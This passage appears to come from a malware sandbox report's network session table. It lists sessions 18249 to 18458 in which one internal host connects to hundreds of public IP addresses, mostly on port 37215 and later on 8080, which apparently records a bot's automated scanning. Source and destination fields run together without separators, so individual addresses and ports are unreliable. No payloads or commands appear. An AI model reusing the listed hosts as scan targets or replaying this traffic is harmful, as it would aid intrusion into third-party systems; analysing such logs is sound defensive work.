                                                        18249192.168.2.2346710157.124.197.5337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18250192.168.2.2358748197.129.27.23637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18251192.168.2.234396489.201.140.1037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18252192.168.2.2355206157.103.174.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18253192.168.2.233323241.87.211.4737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18254192.168.2.234805041.18.236.2937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18255192.168.2.236018441.191.55.23037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18256192.168.2.2352868197.227.93.3637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18257192.168.2.235628841.59.67.2937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18258192.168.2.235139241.129.79.21437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18259192.168.2.2359450197.68.4.5237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18260192.168.2.233908641.164.70.8637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18261192.168.2.2353554157.219.166.6037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18262192.168.2.2333914219.140.161.5237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18263192.168.2.2346570157.58.114.24937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18264192.168.2.233406066.102.196.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18265192.168.2.2343214197.95.255.5337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18266192.168.2.2343842197.233.208.21237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18267192.168.2.2357880197.1.200.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18268192.168.2.2352968157.98.133.12537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18269192.168.2.2348426157.178.55.17837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18270192.168.2.2346828212.104.206.25237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18271192.168.2.2333232197.33.52.20137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18272192.168.2.2338876197.68.57.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18273192.168.2.235313041.180.250.2037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18274192.168.2.2336258197.205.14.11637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18275192.168.2.2350504157.139.92.4337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18276192.168.2.2349332197.247.141.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18277192.168.2.2337860157.20.71.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18278192.168.2.2338750157.101.5.24737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18279192.168.2.2333546157.19.184.9837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18280192.168.2.2333544197.142.35.4837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18281192.168.2.2339268157.177.8.11737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18282192.168.2.234097693.86.28.3837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18283192.168.2.235640297.96.97.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18284192.168.2.233812641.182.2.9137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18285192.168.2.234762641.196.244.9737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18286192.168.2.2335314197.36.138.1837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18287192.168.2.235466441.207.232.22437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18288192.168.2.2335026197.133.74.21837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18289192.168.2.234241491.108.236.337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18290192.168.2.2338664179.217.178.4837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18291192.168.2.2339900157.2.151.1237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18292192.168.2.2342654197.254.79.12937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18293192.168.2.2359550151.10.124.13237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18294192.168.2.2356730197.116.79.14837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18295192.168.2.2352592197.238.5.437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18296192.168.2.2357328206.52.28.20637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18297192.168.2.2339888197.208.246.6637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18298192.168.2.234998441.11.68.8737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18299192.168.2.2358710157.173.82.19037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18300192.168.2.2333648157.168.104.12237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18301192.168.2.2360782143.214.167.25037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18302192.168.2.235787241.116.198.6637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18303192.168.2.2340034197.114.183.18237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18304192.168.2.2335918157.200.124.20737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18305192.168.2.235807458.158.81.6337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18306192.168.2.233576232.195.165.19637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18307192.168.2.235443241.102.244.10437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18308192.168.2.2339186114.125.210.1137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18309192.168.2.235181046.250.137.16237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18310192.168.2.2348328157.216.10.2937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18311192.168.2.2336220157.47.132.11137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18312192.168.2.2338654157.47.131.8837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18313192.168.2.2337630197.98.30.2537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18314192.168.2.233347641.163.12.5037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18315192.168.2.2356252157.211.176.9837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18316192.168.2.2358102157.166.40.14037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18317192.168.2.233468241.65.118.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18318192.168.2.2335674136.3.40.6737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18319192.168.2.235811441.145.66.23637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18320192.168.2.2337244157.0.253.22037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18321192.168.2.235140641.192.252.7537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18322192.168.2.234145041.73.168.4937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18323192.168.2.233609641.185.198.22437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18324192.168.2.2344030176.184.194.20437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18325192.168.2.234766041.170.152.20837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18326192.168.2.2347304157.158.111.17437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18327192.168.2.2344776113.114.101.22337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18328192.168.2.2335364197.240.177.18237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18329192.168.2.23380581.158.79.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18330192.168.2.2337072181.87.3.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18331192.168.2.234278265.7.142.12637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18332192.168.2.2337026157.255.154.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18333192.168.2.2347952157.53.86.1137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18334192.168.2.2355736114.243.2.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18335192.168.2.2338630157.24.73.16737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18336192.168.2.235687095.48.79.2937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18337192.168.2.234268041.50.3.18537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18338192.168.2.233686241.79.179.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18339192.168.2.2343270157.155.129.18737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18340192.168.2.2360386197.33.13.21137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18341192.168.2.235249841.180.110.17437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18342192.168.2.2349736157.124.219.3037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18343192.168.2.2358062191.180.239.17737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18344192.168.2.2339588206.222.173.1237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18345192.168.2.235817041.121.184.10037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18346192.168.2.2346504197.248.141.10937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18347192.168.2.235872841.7.39.7737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18348192.168.2.234601041.226.116.15337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18349192.168.2.2344466157.157.72.16037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18350192.168.2.2342716157.67.59.17737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18351192.168.2.2345972157.84.241.3337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18352192.168.2.2345452157.6.125.4837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18353192.168.2.2352584157.171.171.13237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18354192.168.2.2350596197.148.122.23937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18355192.168.2.2357648192.208.147.9137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18356192.168.2.2357756157.200.215.22937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18357192.168.2.234806441.87.240.19337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18358192.168.2.235700045.237.105.14437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18359192.168.2.2357566197.220.142.23737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18360192.168.2.234379441.169.10.16837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18361192.168.2.2358262157.44.249.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18362192.168.2.234595241.140.163.23037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18363192.168.2.235598841.157.195.16837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18364192.168.2.2357710157.59.74.2137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18365192.168.2.2336926157.157.33.3337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18366192.168.2.2355960157.116.127.4037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18367192.168.2.2334548157.155.186.21337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18368192.168.2.2354570197.124.153.10737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18369192.168.2.2351496187.146.224.19537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18370192.168.2.2357714197.59.246.22937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18371192.168.2.2344752157.151.173.3837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18372192.168.2.2358402157.27.79.137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18373192.168.2.235626680.250.153.20437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18374192.168.2.2337798197.98.158.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18375192.168.2.2346488157.100.70.21537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18376192.168.2.233616441.226.136.17937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18377192.168.2.234585859.42.178.437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18378192.168.2.235895641.159.207.8737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18379192.168.2.2332826197.139.250.6637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18380192.168.2.2350792157.42.230.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18381192.168.2.2340114157.189.215.337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18382192.168.2.2353396197.31.162.237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18383192.168.2.2357830157.233.81.23337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18384192.168.2.235210441.142.112.20437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18385192.168.2.233995841.1.139.20837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18386192.168.2.2348624197.83.102.15037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18387192.168.2.2355926163.180.62.1437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18388192.168.2.233372241.200.177.7437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18389192.168.2.2354288197.164.15.12737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18390192.168.2.235009041.49.229.21037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18391192.168.2.233277618.148.103.14837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18392192.168.2.2358886182.103.32.17137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18393192.168.2.2356054197.109.197.21037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18394192.168.2.2340282157.26.8.23937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18395192.168.2.2345570205.249.99.5737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18396192.168.2.235383441.166.190.9037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18397192.168.2.2342058201.100.210.19537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18398192.168.2.2333552218.73.86.16337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18399192.168.2.235066036.43.0.1337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18400192.168.2.235721241.238.4.15337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18401192.168.2.234486441.152.163.21737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18402192.168.2.234225041.205.174.8437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18403192.168.2.2348620197.240.237.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18404192.168.2.2348588157.54.8.13937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18405192.168.2.234967041.213.201.737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18406192.168.2.2337032197.220.178.15837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18407192.168.2.234054841.40.179.16437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18408192.168.2.236082441.8.23.12637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18409192.168.2.2355690197.94.54.7137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18410192.168.2.2351884219.55.72.1437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18411192.168.2.2343522197.4.61.5137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18412192.168.2.235518841.218.228.13637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18413192.168.2.2355224103.65.105.1137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18414192.168.2.235512892.214.217.7937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18415192.168.2.2351644197.137.134.6137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18416192.168.2.2338918149.81.39.12237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18417192.168.2.2334846157.1.157.837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18418192.168.2.234244414.234.226.8237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18419192.168.2.233994241.121.237.2537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18420192.168.2.233379441.37.28.8237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18421192.168.2.233566441.198.33.21437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18422192.168.2.2342914150.89.111.17237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18423192.168.2.2336180197.119.117.11637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18424192.168.2.2359000157.192.188.21937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18425192.168.2.23483081.119.49.17637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18426192.168.2.235769690.32.165.22237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18427192.168.2.2355284157.98.70.1437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18428192.168.2.233320041.103.200.15037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18429192.168.2.233328841.16.9.12937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18430192.168.2.2351320197.120.222.22937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18431192.168.2.234871474.92.55.17737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18432192.168.2.234694041.93.176.24437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18433192.168.2.2336852157.149.246.1337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18434192.168.2.235556041.22.34.15337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18435192.168.2.234973081.145.172.13337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18436192.168.2.234274890.188.42.9837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18437192.168.2.234194014.86.235.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18438192.168.2.2359390207.16.128.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18439192.168.2.2343712161.204.220.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18440192.168.2.2345164132.156.239.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18441192.168.2.2348776180.189.92.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18442192.168.2.2360226157.139.167.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18443192.168.2.2351098192.0.95.528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18444192.168.2.233404636.188.12.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18445192.168.2.2346586208.63.233.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18446192.168.2.235923260.200.66.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18447192.168.2.2337902126.206.235.2008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18448192.168.2.234377858.103.221.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18449192.168.2.2352182138.62.249.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18450192.168.2.2338990204.150.118.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18451192.168.2.2358880129.61.178.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18452192.168.2.2356220219.244.233.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18453192.168.2.2352250140.213.61.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18454192.168.2.235475091.185.239.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18455192.168.2.2360136197.146.56.14537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18456192.168.2.2334642157.62.89.13537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18457192.168.2.2351690157.163.100.1737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18458192.168.2.234559641.202.196.11537215
                                                        TimestampBytes transferredDirectionData


